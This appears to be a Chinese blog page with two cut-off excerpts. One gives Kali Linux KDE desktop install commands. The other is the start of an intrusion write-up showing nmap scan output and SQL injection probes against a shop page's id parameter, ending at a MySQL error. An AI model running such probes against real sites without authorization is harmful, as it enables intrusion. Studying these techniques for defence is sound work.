kali 是基于Debian的发行版，兼容性和软件支持都很好，默认使用Gnome桌面，如果不喜欢这个桌面环境，可以切换到其它的桌面环境，例如Linux mint使用的Cinnamon和mate桌面，官方源里已经有很多的桌面环境，几条命令就可以搞定切换

KDE桌面

1.KDE Plasma Desktop （最小化的等离子桌面）

安装：

apt-get install kali-defaults kali-root-login desktop-base kde-plasma-desktop

卸载：

apt-get remove kde-plasma-desktop

2.KDE 上网本桌面

安装：

apt-get install kali-defaults kali-root-login desktop-base kde-plasma-netbook

卸载：

apt-get remove  kde-plasma-netbook

3.KDE标准版（Debian精选使用的）

安装：

apt-get install kali-defaults kali-root-login desktop-base kde-standard

卸载：

apt-get remove kde-standard

4.KDE标准版

安装：

apt-get install kali-defaults kali-root-login desktop-base kde-full

卸载：

apt-get remove  kde-full

- 阅读剩余部分 -

声明：本文内容为白盒测试，可能具有攻击性，仅供本人学习研究，任何组织和个人不得利用本文内容攻击他人，请记住：未经授权的入侵是违法行为。

一.踩点

nmap 、nessus、 Acunetix Web Vulnerability Scanner 一起上，尽可能多收集信息（网站、服务器、管理员、域名ip等），查到有vsftp openssh mysql,端口都是默认的，web服务器软件是nginx,google一下这几个软件版本没有什么给力的exp，只能从web入手

nmap -v -A www.target.com
21/tcp   open     ftp            vsftpd 2.0.5
22/tcp   open     ssh            OpenSSH 4.3 (protocol 2.0)
80/tcp   open     http
3306/tcp open     mysql          MySQL 5.1.55-log

二.破门而入

整个网站是邀请注册的，没有登录只能查看很少的几个页面。扫了一下敏感目录,有个UCenter 1.0.0，有个bbs是discuz的，版本很老，在没有其它有用目录了。整个首页的栏目，只有一个在线购买的栏目网址是动态的,应该是第三方程序搞出来的，没其它办法试一试注入:

http://www.target.com/buy/index.php?action=details&id=156 and 1=1  
http://www.target.com/buy/index.php?action=details&id=156 and 1=2

返回不同 ！在试试url后加个’

http://www.target.com/buy/index.php?action=details&id=156'

MySQL Error
Message: MySQL Query Error
SQL: SELECT count(id) as count FROM `give_goods` WHERE gid=156\'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Errno.: 1064
Click here to seek help.

- 阅读剩余部分 -